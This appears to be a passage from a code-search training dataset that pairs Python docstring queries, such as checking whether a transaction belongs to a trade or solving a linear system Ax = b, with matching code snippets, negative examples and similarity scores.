'\\'N\\' + a number) to move or \\'q\\' to give up.')\n return get_char_code.get()", "def token(self):\n return self._token", "def token(self):\n return self._token", "def token(self):\n return self._token", "def step_impl(context):\n fields = {\n 'grant_type': 'authorization_code',\n 'code': context.code,\n 'client_id': context.vendor_config['auth']['client_id'],\n 'redirect_uri': context.vendor_config['auth']['redirect_uri'],\n }\n\n context.response = token_request(fields,\n context.vendor_config['auth'],\n context.conformance)", "def _handle_token(self, token: str) -> Optional[str]:\n return token" ]
[ "0.7076445", "0.6507405", "0.6274373", "0.61903304", "0.61763257", "0.60805154", "0.60519487", "0.59225285", "0.58747536", "0.58657783", "0.5859614", "0.58332205", "0.5826598", "0.5803254", "0.5735543", "0.5734467", "0.5734467", "0.57258177", "0.5707536", "0.5696128", "0.56801826", "0.56801826", "0.5679771", "0.56567204", "0.5643414", "0.5598562", "0.5598562", "0.5598562", "0.55601126", "0.55597603" ]
0.70282006
1
Determine if the transaction(t) belongs to trade(tr) without altering the tr
def tranBelong(tr, lst, t): if tr.isReal(): cp = Trade() cp.state = tr.state cp.addTrans(tr.tranCol+lst, False) else: cp = tr return cp.belong(t)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def is_transaction(self):\n return self._request.has_var(\"_transid\")", "def _check_duplicate_trans(self):\n transactions_set = set(self._transactions)\n return len(transactions_set) == len(self._transactions)", "def is_transaction(self) -> bool:\n return False", "def isTx(self):\n\t\treturn self.extension == '.tx'", "def __eq__(self, other: Any) -> bool:\n if not isinstance(other, Transaction):\n return False\n return self.to_solders() == other.to_solders()", "def transaction_exists(self, transaction: \"Transaction\") -> bool:\n try:\n super().inspect_transaction(transaction=transaction)\n return True\n except grpc.RpcError as err:\n err: grpc.Call\n if err.code() == grpc.StatusCode.NOT_FOUND:\n return False\n raise err", "def IsTriggeredBy(self, settlement):\n if not _is_valid_sbl_settlement(settlement):\n return False\n \n partial_return_identifier = settlement.Trade().Text1()\n if settlement.Status() != 'Settled':\n return False\n if partial_return_identifier not in ['', None]:\n return False\n loan_trade = settlement.Trade().ContractTrdnbr()\n if not _is_settled_loan_settlements(loan_trade):\n return False\n\n return True", "def __ne__(self, other):\n if not isinstance(other, Transaction):\n return True\n\n return self.to_dict() != other.to_dict()", "def remove_trade(self, trade):\n if not trade:\n return False\n\n self.lock()\n self.trades.remove(trade)\n self.unlock()", "def is_buy(order):\n return(copysign(1, order.amount)>=0)", "def IsTriggeredBy(self, settlement):\n if not _is_valid_sbl_settlement(settlement):\n return False\n \n partial_return_identifier = settlement.Trade().Text1()\n if settlement.Status() != 'Authorised':\n return False\n if partial_return_identifier != 'PARTIAL_RETURN':\n return False\n loan_trade = settlement.Trade().ContractTrdnbr()\n if _is_settled_loan_settlements(loan_trade):\n return False\n\n return True", "def verify_transaction(transaction):\n sender_balance = get_balance(transaction['sender'])\n return sender_balance >= transaction['amount']", "def trigger(self, trade) -> bool:\n pass", "def is_affordable_transaction(self, tx_message: TransactionMessage) -> bool:\n if tx_message.amount == 0 and all(\n quantity == 0 for quantity in tx_message.tx_quantities_by_good_id.values()\n ):\n # reject the transaction when there is no wealth exchange\n result = False\n elif tx_message.amount <= 0 and all(\n quantity >= 0 for quantity in tx_message.tx_quantities_by_good_id.values()\n ):\n # check if the agent has the money to cover the sender_amount (the agent=sender is the buyer)\n result = (\n self.amount_by_currency_id[tx_message.currency_id]\n >= tx_message.sender_amount\n )\n elif tx_message.amount >= 0 and all(\n quantity <= 0 for quantity in tx_message.tx_quantities_by_good_id.values()\n ):\n # check if the agent has the goods (the agent=sender is the seller).\n result = all(\n self.quantities_by_good_id[good_id] >= -quantity\n for good_id, quantity in tx_message.tx_quantities_by_good_id.items()\n )\n else:\n result = False\n return result", "def _is_valid_trade(self, trade):\n if not trade:\n return False\n\n if trade.Status() in VALID_TRADE_STATUSES:\n if acm.Time().AsDate(trade.TradeTime()) > self.start_date:\n return False\n print '1'\n ins_type = trade.Instrument().InsType()\n if ins_type == 'Curr':\n if trade.ValueDay() > self.start_date:\n return True\n elif ins_type == 'Combination':\n for comb_ins in trade.Instrument().Instruments():\n trades = comb_ins.Trades()\n if trades and trades[0] in VALID_TRADE_STATUSES:\n trade = trades[0]\n ins_type = trade.Instrument().InsType()\n if (self._is_basis_trade(trade) and\n ins_type in ('Swap', 'FRA')):\n return True\n elif ins_type == 'CurrSwap':\n if trade.Instrument().ExpiryDateOnly() > self.start_date:\n return True\n else:\n if trade.Instrument().ExpiryDateOnly() > self.start_date:\n if (self._is_basis_trade(trade) and\n ins_type in ('Swap', 'FRA')):\n return True\n\n return False", "def check_transaction(self):\n if self.transaction_valid():\n transid = self._request.var(\"_transid\")\n if transid and transid != \"-1\":\n self._invalidate(transid)\n return True\n else:\n return False", "def is_market(self):\n return(not self.is_pending)", "def __eq__(self, other):\n if not isinstance(other, Transaction):\n return False\n\n return self.to_dict() == other.to_dict()", "def in_transaction(self):\n # We likely just changed data - give it a second to catch up\n time.sleep(0.1) # I think I keep reading journal watermark too soon without this\n \n # Get relevant data\n water_mark = pos.read_journal_watermark()\n self.log.info(f\"Watermark: [{water_mark}]\")\n balance = pos.read_balance()['Total']\n self.log.info(f\"Balance: [{balance}]\")\n \n # Decide if we need more checks based on watermark\n if water_mark == \"TRANSACTION IN PROGRESS\":\n self.log.info(\"In Transaction: In Transaction Watermark found\")\n return True\n elif water_mark == \"TRANSACTION COMPLETE\" or water_mark == \"TRANSACTION VOIDED\":\n self.log.info(\"Not in Transaction: Transaction Complete/Voided watermarks found\")\n return False\n else:\n # No watermark - decide based on balance\n if balance == \"$0.00\":\n self.log.info(\"Not in Transaction: $0 balance with no watermark\")\n return False\n else:\n self.log.info(\"In Transaction: Non-$0 balance with no watermark\")\n return True", "def is_tx(self):\n return self._pin_name in TX_CHANNELS", "def Trading(Seller,Buyer):\n if Seller.has_sold == False:\n if Buyer.like_buy >= Seller.like_sell:\n Seller.has_sold = True\n Buyer.has_bought = True\n Seller.sold_objects += 1\n Buyer.bought_objects += 1\n print('A trade has been made')\n else:\n Buyer.has_bought = False\n Seller.has_sold = False\n print('There was no deal')\n else:\n Buyer.has_bought = False", "def get_physical_trade(t_exer):\n if not t_exer.insaddr.und_insaddr:\n return None\n ins = ael.Instrument.read('insaddr={0}'.format(t_exer.insaddr.insaddr))\n is_strike_quotation_different = 0\n if (ins.und_insaddr.quotation_seqnbr and ins.strike_quotation_seqnbr and\n ins.strike_quotation_seqnbr != ins.und_insaddr.quotation_seqnbr):\n is_strike_quotation_different = 1\n\n und = ael.Instrument.read('insaddr={0}'.format(\n t_exer.insaddr.und_insaddr.insaddr))\n pr_trades = ael.Trade.select('contract_trdnbr={0}'.format(\n t_exer.contract_trdnbr))\n for t in pr_trades:\n if t.insaddr.insaddr == und.insaddr:\n return t\n elif (is_strike_quotation_different and t.curr.insaddr == und.insaddr):\n return t", "def _apply_trx_trade_to_allocation(cls, allocation, block_trade):\n try:\n allocation.TrxTrade(block_trade)\n allocation.Commit()\n except Exception as e:\n error_message = 'Failed to stamp TrxTrade {0} on Allocation Trade: {1} , {2}'\n LOGGER.exception(error_message.format(block_trade.Oid(), allocation.Oid(), e))\n return False\n\n return True", "def IsTriggeredBy(self, settlement):\n if not _is_valid_sbl_fee_settlement(settlement):\n return False\n\n return True", "def __eq__(self, other):\n if not isinstance(other, MarketOrderRejectTransaction):\n return False\n\n return self.__dict__ == other.__dict__", "def hasTx(self):\n\t\tif self.isTx:\n\t\t\treturn True\n\t\treturn textureFile( self.path.replace( self.extension, '.tx' ) ).exists", "def compare_bytes_with_local_tx(self, tx: BaseTransaction) -> bool:\n assert tx.hash is not None\n # XXX: we have to accept any scope because we only want to know what bytes we have stored\n with tx_allow_context(self, allow_scope=TxAllowScope.ALL):\n local_tx = self.get_transaction(tx.hash)\n local_tx_bytes = bytes(local_tx)\n tx_bytes = bytes(tx)\n if tx_bytes == local_tx_bytes:\n return True\n self.log.critical('non-equal transactions with same id', tx_id=tx.hash.hex(),\n local_tx=local_tx_bytes.hex(), tx=tx_bytes.hex())\n return False", "def __eq__(self, other):\n if not isinstance(other, AccountTransactionItem):\n return False\n\n return self.__dict__ == other.__dict__", "def add_trade(self, trade):\n if not trade:\n return False\n\n self.lock()\n\n trade.id = self._next_trade_id\n self._next_trade_id += 1\n\n self.trades.append(trade)\n self.unlock()", "def test_transactions_no_save(self):\n\n transactions = self.bidding_round_manager.transactions_no_save([self.bidding_round])\n transactions = sorted(transactions, key=lambda x: (x.sell.order_id, x.buy.order_id))\n transactions_iterator = iter(transactions)\n\n self.is_equal_transaction(transactions_iterator.next(),\n Transaction(sell=self.stock_order_seller_0, buy=self.stock_order_third_party_0,\n share_amount=2,\n share_price=self.stock_order_seller_0.order_price_per_share,\n transaction_status=PROCESSED))\n self.is_equal_transaction(transactions_iterator.next(),\n Transaction(sell=self.stock_order_seller_0, buy=self.stock_order_third_party_1,\n share_amount=2,\n share_price=self.stock_order_seller_0.order_price_per_share,\n transaction_status=PROCESSED))\n self.is_equal_transaction(transactions_iterator.next(),\n Transaction(sell=self.stock_order_seller_0, buy=self.stock_order_third_party_2,\n share_amount=1,\n share_price=self.stock_order_seller_0.order_price_per_share,\n transaction_status=PROCESSED))\n self.is_equal_transaction(transactions_iterator.next(),\n Transaction(sell=self.stock_order_seller_0, buy=self.stock_order_employer_0,\n share_amount=10,\n share_price=self.stock_order_seller_0.order_price_per_share,\n transaction_status=PROCESSED))\n self.is_equal_transaction(transactions_iterator.next(),\n Transaction(sell=self.stock_order_seller_0, buy=self.stock_order_employer_1,\n share_amount=10,\n share_price=self.stock_order_seller_0.order_price_per_share,\n transaction_status=PROCESSED))\n self.is_equal_transaction(transactions_iterator.next(),\n Transaction(sell=self.stock_order_seller_0, buy=self.stock_order_employer_2,\n share_amount=10,\n share_price=self.stock_order_seller_0.order_price_per_share,\n transaction_status=PROCESSED))\n self.is_equal_transaction(transactions_iterator.next(),\n Transaction(sell=self.stock_order_seller_1, buy=self.stock_order_third_party_2,\n share_amount=9,\n share_price=self.stock_order_seller_1.order_price_per_share,\n transaction_status=PROCESSED))" ]
[ "0.63742304", "0.6370735", "0.6219345", "0.60635024", "0.601319", "0.5980037", "0.5893599", "0.58903027", "0.5867999", "0.5838565", "0.57914907", "0.5791342", "0.5782304", "0.5757709", "0.5725929", "0.5687621", "0.56499726", "0.56397974", "0.5625594", "0.56239665", "0.55964035", "0.55510736", "0.5543386", "0.5539045", "0.549389", "0.54919744", "0.5491017", "0.54802424", "0.54647964", "0.5415118" ]
0.69847286
0
Solve linear system Ax = b with A matrix in filename and b = (0, 1, 2, 3, ...) using the specified method
def solve_system(A, method): # find b vector such that Ax = b # with x = [0 1 2 ... size(m)] size = A.shape true_x = list(xrange(0, size[1])) b = A.dot(true_x) # solve Ax = b and check solution error # diretti if method in [sla.spsolve, direttolu]: x = method(A, b) print("\t" + method.func_name + " solved " + str(size)) return x, sol_error(x, true_x) # iterativi else: # per accellerare la convergenza dei metodi iterativi # dobbiamo passare un precondizionatore (una matrice M, # che approssima l'inversa di A) # http://osdir.com/ml/python-scientific-user/2011-06/msg00249.html try: P = sla.spilu(A, drop_tol=1e-5) except Exception as err: print("\t", err) print("\tPorta le tue sporche matrici singolari altrove...") return None, "nan" M = sla.LinearOperator(size, P.solve) global current_x current_x = None try: x, status = method(A, b, tol=1e-16, M=M, maxiter=500, callback=callback_func) except Exception: print("\t" + method.func_name + " converged on " + str(size)) return current_x, sol_error(current_x, true_x) if status != 0: print("\t" + method.func_name + " DIDN'T converge on " + str(size) + " in less than 500 iterations") return current_x, sol_error(x, true_x) else: print("\t" + method.func_name + " converged on " + str(size)) return current_x, sol_error(x, true_x)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def Solver(line1, line2):\n\ta = np.array(line1[0])\n\tb = np.array(line1[1])\n\tu = np.array(line2[0])\n\tv = np.array(line2[1])\n\t#print(a,b,u,v)\n\tc = u[:2]-a[:2]\n\tA = np.vstack((b[:2],-v[:2])).T\n\t#print(A)\n\tx = np.linalg.solve(A,c)\n\t#print(x)\n\tp = a+x[0]*b\n\t#print(p)\n\treturn p", "def solve(ctx):\n my_solver(ctx.obj['filename'])", "def BuildSystem_Linear(M,C,K,Ya,Yv,Yq,Fp=None,Pp=None,Yp=None,Yu=None,Method='default'):\n nDOF = M.shape[0]\n nY = Yq.shape[0]\n if Yu is None:\n nU = 0\n Yu = np.zeros((nY,nU))\n else:\n nU = Yu.shape[1]\n\n if Method=='default':\n Z=np.zeros((nDOF,nDOF))\n I=np.eye(nDOF)\n Xx = np.block( [ [Z , I ], [ mM_K, mM_C] ])\n Xu = np.zeros((2*nDOF,nU))\n Yx = np.block( [ Yq + np.dot(Ya,mM_K), Yv + np.dot(Ya, mM_C) ] )\n elif Method == 'augmented_first_order':\n # Needs Fp and Pp to be defined!\n if Fp is None or Pp is None:\n raise Exception('Both Fp and Pp needs to be set with augmented first order method')\n nP = Fp.shape[1]\n if Yp is None:\n Yp=np.zeros((nY,nP))\n\n Z = np.zeros((nDOF,nDOF))\n Znnp = np.zeros((nDOF,nP ))\n Znpn = np.zeros((nP ,nDOF))\n I = np.eye(nDOF)\n mM_K = np.linalg.solve(-M,K)\n mM_C = np.linalg.solve(-M,C)\n M_Fp = np.linalg.solve(M,Fp)\n Xx = np.block( [ [Z, I ,Znnp] , [mM_K, mM_C, M_Fp], [Znpn, Znpn, Pp] ])\n Xu = np.zeros((2*nDOF+nP,nU))\n Yx = np.block( [Yq + np.dot(Ya,mM_K), Yv + np.dot(Ya,mM_C), Yp+np.dot(Ya,M_Fp) ])\n# print('Yq..:\\n', Yq + np.dot(Ya,mM_K))\n# print('Yv..:\\n', Yv + np.dot(Ya,mM_C))\n# print('Fp..:\\n', Yp+np.dot(Ya,M_Fp) )\n else:\n raise Exception('Method %s not implemented')\n \n return Xx,Xu,Yx,Yu", "def solve(matrix, b):\n lu_matrix = decompose_to_LU(matrix)\n # get supporting vector y\n y = np.matrix(np.zeros([lu_matrix.shape[0], 1]), dtype=np.float64)\n for i in range(y.shape[0]):\n y[i, 0] = b[i] - lu_matrix[i, :i] * y[:i]\n\n # get vector of answers x\n x = np.matrix(np.zeros([lu_matrix.shape[0], 1]))\n for i in range(1, x.shape[0] + 1):\n x[-i, 0] = (y[-i] - lu_matrix[-i, -i:] * x[-i:, 0]) / lu_matrix[-i, -i]\n\n return np.array(x.transpose()[0], dtype=np.float64)[0]", "def solve_matrix(M, b):\n\n try:\n x = np.linalg.solve(M, b)\n except np.LinAlgError:\n print(\"ERR: Matrix is singular\")\n return None\n\n if not np.allclose(np.dot(M, x), b):\n print(\"ERR: Matrix is inconsistent (most likely with the independent sources)\")\n return None\n \n return x", "def linear(m, b, x, xx):\n y = m*(x - xx) + b\n return y", "def solve_lu(matvec: Callable, b: jnp.ndarray) -> jnp.ndarray:\n if len(b.shape) == 0:\n return b / _materialize_array(matvec, b.shape)\n elif len(b.shape) == 1:\n A = _materialize_array(matvec, b.shape, b.dtype)\n return jax.numpy.linalg.solve(A, b)\n elif len(b.shape) == 2:\n A = _materialize_array(matvec, b.shape, b.dtype) # 4d array (tensor)\n A = A.reshape(-1, b.shape[0] * b.shape[1]) # 2d array (matrix)\n return jax.numpy.linalg.solve(A, b.ravel()).reshape(*b.shape)\n else:\n raise NotImplementedError", "def solve(self):\n\n # Assign variables to each quantity being solved.\n r_lookup, lookup, num = {}, {}, 0\n for element in self.elements:\n if is_wire(element) and element is not self.ground:\n lookup[num] = element\n r_lookup[element] = num\n num += 1\n elif not is_cs(element) and element is not self.ground:\n lookup[num] = element\n r_lookup[element] = num\n num += 1\n\n # Set up the linear algebraic equation Ax=b\n A = np.zeros((num, num))\n b = np.zeros(num)\n for row, element in lookup.items():\n if is_wire(element) and element is not self.ground:\n for two_sided in element.attached:\n if is_cs(two_sided):\n if two_sided.pos is element:\n b[row] += -1 * two_sided.current\n else:\n b[row] += two_sided.current\n else:\n if two_sided.pos is element:\n flow = 1\n else:\n flow = -1\n A[row, r_lookup[two_sided]] = flow\n elif is_vs(element):\n check_connected(element)\n if element.pos is not self.ground:\n A[row, r_lookup[element.pos]] = 1\n if element.neg is not self.ground:\n A[row, r_lookup[element.neg]] = -1\n b[row] = element.voltage\n elif is_resistor(element):\n check_connected(element)\n if element.pos is not self.ground:\n A[row, r_lookup[element.pos]] = 1\n if element.neg is not self.ground:\n A[row, r_lookup[element.neg]] = -1\n A[row, r_lookup[element]] = -1 * element.resistance\n\n b = b.reshape((num, 1))\n try:\n x = np.linalg.solve(A, b)\n except np.linalg.LinAlgError:\n raise CircuitError('Insufficient information to solve circuit')\n\n # Assign values to all circuit components\n for i in range(num):\n item = lookup[i]\n if is_wire(item):\n item.potential = x[i, 0]\n elif isinstance(item, DualSided):\n item.current = x[i, 0]\n\n # Mark circuit as solved\n self.been_solved = True", "def compute(self, solver=\"cbc\", **kwargs):\n self.table2es()\n logging.info(\"Creating the linear model...\")\n model = solph.Model(self.es)\n logging.info(\"Done. Optimise the model.\")\n self.solve(model, solver=solver, **kwargs)", "def solver(I, f, c, bc, Lx, Ly, nx, ny, dt, tstop,\n user_action=None, \n implementation={'ic': 'vec', # or 'scalar' or 'weave'\n 'inner': 'vec',\n 'bc': 'vec',\n 'storage': 'f77'},\n verbose=True):\n dx = Lx/float(nx)\n dy = Ly/float(ny)\n x = linspace(0, Lx, nx+1) # grid points in x dir\n y = linspace(0, Ly, ny+1) # grid points in y dir\n xv = x[:,newaxis] # for vectorized function evaluations\n yv = y[newaxis,:]\n\n if dt <= 0: # max time step?\n dt = (1/float(c))*(1/sqrt(1/dx**2 + 1/dy**2))\n Cx = c*dt/dx**2; Cy = c*dt/dy**2 # help variables\n\n up = zeros((nx+1,ny+1)) # solution array\n u = up.copy() # solution at t-dt\n\n # use scalar implementation mode if no info from user:\n if 'ic' not in implementation:\n implementation['ic'] = 'scalar'\n if 'bc' not in implementation:\n implementation['bc'] = 'scalar'\n if 'inner' not in implementation:\n implementation['inner'] = 'scalar'\n\n if 'weave' in implementation.itervalues() or \\\n 'f77' in implementation.itervalues():\n # we avoid callback to Python and require f, bc, and I to be\n # string formulas:\n print f, bc, I\n if not isinstance(f, StringFunction) or \\\n not isinstance(bc, StringFunction) or \\\n not isinstance(I, StringFunction):\n raise TypeError, \\\n 'with Weave or F77, f, bc, and I must be StringFunction'\n\n if 'f77' in implementation.itervalues():\n make_f77(f, bc, I) # build F77 module\n import f77\n # unified names with py versions:\n ic_f77 = f77.ic_f77\n bc_f77 = f77.bc_f77\n scheme_f77 = f77.scheme_f77\n \n # turn arrays to column major storage after the init. cond.\n\n # set initial condition:\n t0 = time.clock()\n t = 0.0\n print '***', implementation['ic']\n func = 'ic_'+implementation['ic']\n if func == 'ic_vec':\n u = eval(func)(u, I, xv, yv)\n elif func == 'ic_f77':\n u = eval(func)(u, x, y)\n else:\n u = eval(func)(u, I, x, y)\n t_ic = time.clock() - t0\n \n\n if implementation['inner'] == 'f77':\n # turn input arrays to Fortran storage for all arrays\n # that are input arrays in loop subroutine\n # (actually not necessary as up, u, and um are all fed\n # through the f77.loop routine and brought to column\n # major storage in turn - recall um=u, u=up, up=um)\n if implementation.get('storage', 'f77') == 'f77':\n up = asarray(up, order='Fortran')\n u = asarray(u, order='Fortran')\n\n if user_action is not None:\n user_action(u, xv, yv, t) # allow user to plot etc.\n\n t_inner = 0 # CPU time inner loops\n t_bc = 0 # CPU time boundary update\n \n while t <= tstop:\n t_old = t; t += dt\n if verbose:\n print 'solving (%s version) at t=%g' % \\\n (implementation['inner'], t)\n\n t0 = time.clock()\n # update all inner points:\n func = 'scheme_'+implementation['inner']\n if func == 'scheme_vec':\n up = eval(func)(up, u, um, f, xv, yv, t, Cx, Cy, dt2, t_old)\n elif func == 'scheme_f77':\n up = eval(func)(up, u, um, x, y, t, Cx, Cy, dt2, t_old)\n else:\n up = eval(func)(up, u, um, f, x, y, t, Cx, Cy, dt2, t_old)\n\n #id_u = id(u); id_um = id(um)\n #up,u,um = f77.loop(up, u, um, f_array, Cx, Cy, dt2)\n #print 'u changed:', id_u!=id(u),\n #print 'um changed:', id_um!=id(um),\n t_inner += time.clock() - t0\n\n t0 = time.clock()\n # insert boundary conditions:\n func = 'bc_'+implementation['bc']\n if func == 'bc_f77':\n up = eval(func)(up, x, y, t)\n else:\n up = eval(func)(up, bc, x, y, t)\n t_bc += time.clock() - t0\n \n if user_action is not None:\n user_action(up, xv, yv, t)\n # update data structures for next step:\n u, up = u, up\n\n # dt might be computed in this function\n return dt, t_ic, t_inner, t_bc", "def linear_program_eq(self, c, A, b, lb, ub):\n if self.solver == solver_SCIPY:\n c = c.reshape((c.size,))\n b = b.reshape((b.size,))\n return scipy_linear_program_eq(c, A, b, lb, ub)\n elif self.solver == solver_GUROBI:\n return gurobi_linear_program_eq(c, A, b, lb, ub)\n else:\n raise ValueError('QP solver %s not available' % self.solver)", "def solve(self, b):\n raise NotImplementedError", "def solver(I, V, m, b, s, F, t, damping='linear'):\n N = t.size - 1 # No of time intervals\n dt = t[1] - t[0] # Time step\n u = np.zeros(N+1) # Result array\n b = float(b); m = float(m) # Avoid integer division\n\n # Convert F to array\n if callable(F):\n F = F(t)\n elif isinstance(F, (list,tuple,np.ndarray)):\n F = np.asarray(F)\n else:\n raise TypeError(\n 'F must be function or array, not %s' % type(F))\n\n u[0] = I\n if damping == 'linear':\n u[1] = u[0] + dt*V + dt**2/(2*m)*(-b*V - s(u[0]) + F[0])\n elif damping == 'quadratic':\n u[1] = u[0] + dt*V + \\\n dt**2/(2*m)*(-b*V*abs(V) - s(u[0]) + F[0])\n else:\n raise ValueError('Wrong value: damping=\"%s\"' % damping)\n\n for n in range(1,N):\n if damping == 'linear':\n u[n+1] = old_div((2*m*u[n] + (b*dt/2 - m)*u[n-1] +\n dt**2*(F[n] - s(u[n]))),(m + b*dt/2))\n elif damping == 'quadratic':\n u[n+1] = old_div((2*m*u[n] - m*u[n-1] + b*u[n]*abs(u[n] - u[n-1])\n - dt**2*(s(u[n]) - F[n])),\\\n (m + b*abs(u[n] - u[n-1])))\n return u, t", "def LU_solve(A, d, b):\n \n\n L, U = L1U(A, d)\n\n y = rforwardsolve(L, b, d)\n x = rbackwardsolve(U, y, d)\n\n return x", "def solver(direc):\r\n\r\n # open inputfile\r\n file = 'schroedinger.inp'\r\n fn = os.path.join(direc, file)\r\n inp_all = open(fn, 'r')\r\n\r\n # read parameters from inputfile\r\n lines = inp_all.readlines()\r\n inp_mass = lines[0].split()[0]\r\n mass = float(inp_mass)\r\n inp_xmin = lines[1].split()[0]\r\n xmin = float(inp_xmin)\r\n inp_xmax = lines[1].split()[1]\r\n xmax = float(inp_xmax)\r\n inp_npoint = lines[1].split()[2]\r\n npoint = int(inp_npoint)\r\n inp_firsteigval = lines[2].split()[0]\r\n firsteigval = int(inp_firsteigval)\r\n inp_lasteigval = lines[2].split()[1]\r\n lasteigval = int(inp_lasteigval)\r\n interpoltype = lines[3].split()[0]\r\n inp_nrinterpolpoints = lines[4].split()[0]\r\n nrinterpolpoints = int(inp_nrinterpolpoints)\r\n len_pot = len(lines)-5\r\n xpot = np.zeros(len_pot)\r\n ypot = np.zeros(len_pot)\r\n for ii in range(5, len_pot+5):\r\n xpot[ii - 5] = float(lines[ii].split()[0])\r\n ypot[ii - 5] = float(lines[ii].split()[1])\r\n\r\n # read interpolation type and interpolate the potential\r\n xx = np.linspace(xmin, xmax, npoint)\r\n if interpoltype == 'linear':\r\n pot = np.interp(xx, xpot, ypot)\r\n elif interpoltype == 'polynomial':\r\n degree = int(nrinterpolpoints - 1)\r\n coef = np.polyfit(xpot, ypot, degree)\r\n polf = np.poly1d(coef)\r\n pot = polf(xx)\r\n elif interpoltype == 'cspline':\r\n cubicf = interp1d(xpot, ypot, kind='cubic')\r\n pot = cubicf(xx)\r\n else:\r\n print('interpolation type not found')\r\n sys.exit(1)\r\n\r\n # save x- and y-values for interpolated potential in potential.dat file\r\n potential = np.array([xx, pot])\r\n xypotential = potential.T\r\n np.savetxt(os.path.join(direc, 'potential.dat'), xypotential)\r\n\r\n # formulate matrix-problem for the discretised Schroedinger equation\r\n matrix = np.zeros((npoint, npoint))\r\n delta = abs((xmax-xmin)/(npoint))\r\n aa = 1/(mass*(delta)**2)\r\n for ii in range(1, npoint):\r\n matrix[ii, ii-1] = -aa/2\r\n for ii in range(0, npoint):\r\n matrix[ii, ii] = aa+pot[ii]\r\n for ii in range(0, npoint-1):\r\n matrix[ii, ii+1] = -aa/2\r\n\r\n # compute eigenvalues and eigenvectors\r\n energy, wavefunc = scipy.linalg.eigh(matrix, eigvals=(int(firsteigval-1),\r\n int(lasteigval-1)))\r\n\r\n # normalize wavefunctions\r\n deltavec = delta*np.ones((1, npoint))\r\n wavefunc_sq = wavefunc**2\r\n norm_sq = np.dot(deltavec, wavefunc_sq)\r\n norm = 1/(np.sqrt(norm_sq))\r\n norm_wavefunc = np.dot(wavefunc, np.diag(np.reshape(norm,\r\n (len(energy), ))))\r\n\r\n # save eigenvalues and eigenvectors in energies.dat and wavefuncs.dat files\r\n np.savetxt(os.path.join(direc, 'energies.dat'), energy)\r\n wavefuncs = np.hstack((xx.reshape((npoint, 1)), norm_wavefunc))\r\n np.savetxt(os.path.join(direc, 'wavefuncs.dat'), wavefuncs)\r\n\r\n # compute expectation values and uncertainty for the position\r\n exp_value = np.zeros(lasteigval-firsteigval+1)\r\n exp_value_sq = np.zeros(lasteigval-firsteigval+1)\r\n uncert_x = np.zeros(lasteigval-firsteigval+1)\r\n for ii in range(firsteigval-1, lasteigval):\r\n exp_value[ii] = delta*np.sum(norm_wavefunc[:, ii]**2*xx)\r\n exp_value_sq[ii] = delta*np.sum(norm_wavefunc[:, ii]**2*xx**2)\r\n uncert_x[ii] = np.sqrt(exp_value_sq[ii]-exp_value[ii]**2)\r\n\r\n # save expectation values and uncertainty for the position in expvalues.dat\r\n expvalues = np.array([exp_value, uncert_x])\r\n datexpvalues = expvalues.T\r\n np.savetxt(os.path.join(direc, 'expvalues.dat'), datexpvalues)\r\n\r\n return xypotential, energy", "def solve_den(self, b, method=None):\n m, n = self.shape\n bm, bn = b.shape\n\n if m != bm:\n raise DMShapeError(\"Matrix equation shape mismatch.\")\n\n if method is None:\n method = 'rref'\n elif method == 'charpoly' and m != n:\n raise DMNonSquareMatrixError(\"method='charpoly' requires a square matrix.\")\n\n if method == 'charpoly':\n xnum, xden = self.solve_den_charpoly(b)\n elif method == 'rref':\n xnum, xden = self.solve_den_rref(b)\n else:\n raise DMBadInputError(\"method should be 'rref' or 'charpoly'\")\n\n return xnum, xden", "def solve(self, A, B):\n return tf.matrix_solve_ls(matrix=A, rhs=B)", "def test_linear():\n import nose.tools as nt\n A = -0.11; B = -0.13; g = 9.81; m = 50.; T = 10.; dt = 0.01;\n Cd = 1.2; rho = 1.0; A = 0.5;\n a = Cd*rho*A/(2.*m)\n def exact(t):\n return A*t+B\n\n def src(t):\n return m*g + m*a*abs(exact(t-dt/2.))*exact(t+dt/2.) + m*A\n \n v, t = solver(T, dt, B, Cd, rho, A, m, Source=src)\n ve = exact(t)\n diff = abs(ve - v)\n nt.assert_almost_equal(diff.max(), 0, delta=1e-12)", "def solver(\n kappa, f, u_D, Nx, Ny, degree=1,\n linear_solver='Krylov', # Alternative: 'direct'\n abs_tol=1E-5, # Absolute tolerance in Krylov solver\n rel_tol=1E-3, # Relative tolerance in Krylov solver\n max_iter=1000, # Max no of iterations in Krylov solver\n log_level=PROGRESS, # Amount of solver output\n dump_parameters=False, # Write out parameter database?\n ):\n # Create mesh and define function space\n mesh = UnitSquareMesh(Nx, Ny)\n V = FunctionSpace(mesh, 'P', degree)\n\n def boundary(x, on_boundary):\n return on_boundary\n\n bc = DirichletBC(V, u_D, boundary)\n\n # Define variational problem\n u = TrialFunction(V)\n v = TestFunction(V)\n a = kappa*dot(grad(u), grad(v))*dx\n L = f*v*dx\n\n # Compute solution\n u = Function(V)\n\n if linear_solver == 'Krylov':\n prm = parameters['krylov_solver'] # short form\n prm['absolute_tolerance'] = abs_tol\n prm['relative_tolerance'] = rel_tol\n prm['maximum_iterations'] = max_iter\n print(parameters['linear_algebra_backend'])\n set_log_level(log_level)\n if dump_parameters:\n info(parameters, True)\n solver_parameters = {'linear_solver': 'gmres',\n 'preconditioner': 'ilu'}\n else:\n solver_parameters = {'linear_solver': 'lu'}\n\n solve(a == L, u, bc, solver_parameters=solver_parameters)\n return u", "def main():\n \n fname = sys.argv[1]\n fin = open(fname)\n a123 = []\n batms = []\n##### Read in old basis and vectors\n for line in fin:\n if line[0] == \"#\": continue\n \n line = line.split()\n line = [ float(x.strip()) for x in line[:3] ]\n \n if len(a123) == 3: batms.append(line); continue\n a123.append(line)\n \n fname = sys.argv[2]\n fin = open(fname)\n b123 = []\n for line in fin:\n if line[0] == \"#\": continue\n \n line = line.split()\n line = [ float(x.strip()) for x in line[:3] ]\n \n b123.append(line)\n if len(b123) == 3: break\n \n print \"... lattice vectors \\n old new \"\n for i in range(3):\n print (\" %1.4f | %1.4f | %1.4f %1.4f | %1.4f | %1.4f \" % \n (a123[0][i], a123[1][i], a123[2][i], b123[0][i], b123[1][i], b123[2][i]) )\n \n print \"... basis atoms = \"\n for i in range(len(batms)):\n print \" %1.4f %1.4f %1.4f\" % (batms[i][0], batms[i][1], batms[i][2])\n \n\n##### Read in new basis that you want to switch to\n##### Take any point q_A = (q1,q2,q3) then q_E = q1*a1_E + q2*a2_E + q3*a3_E = (x, y ,z)\n##### Hence, we can say that q_B = (p1,p2,p3) = q1*a1_B + q2*a2_B + q3*a3_B\n\n##### Writing in matrix 